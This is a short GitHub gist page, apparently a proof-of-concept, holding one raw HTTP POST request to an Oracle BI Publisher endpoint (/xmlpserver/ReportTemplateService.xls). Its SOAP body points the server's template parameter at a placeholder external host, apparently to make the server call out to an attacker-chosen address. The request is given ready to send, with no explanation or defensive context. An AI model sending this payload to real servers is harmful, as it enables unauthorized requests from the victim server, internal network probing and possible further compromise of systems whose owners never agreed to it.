Created
September 13, 2021 09:57
Revisions
-
testanull created this gist
Sep 13, 2021 .There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,18 @@ POST /xmlpserver/ReportTemplateService.xls HTTP/1.1 Host: 192.168.139.212 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: text/xml Content-Length: 1317 <?xml version="1.0"?> <soap-env:Envelope soap-env:encodingStyle='http://schemas.xmlsoap.org/soap/encoding/' xmlns:soap-enc='http://schemas.xmlsoap.org/soap/encoding/' xmlns:soap-env='http://schemas.xmlsoap.org/soap/envelope/' xmlns:xsd='http://www.w3.org/1999/XMLSchema' xmlns:xsi='http://www.w3.org/1999/XMLSchema-instance' > <soap-env:Body > <sg:replyToXML xmlns:sg="http://xmlns.oracle.com/oxp/service/service_gateway"> <incomingXML xsi:type='xsd:string'><?xml version = "1.0"?><xdoservice:method xmlns:xdoservice="http://xmlns.oracle.com/oxp/service" template="http://EXTERNAL_HOST.COM" name="validateLogin"><xdoservice:param xmlns:xdoservice="http://xmlns.oracle.com/oxp/service" value="asasdasd"></xdoservice:param></xdoservice:method></incomingXML> </sg:replyToXML> </soap-env:Body> </soap-env:Envelope>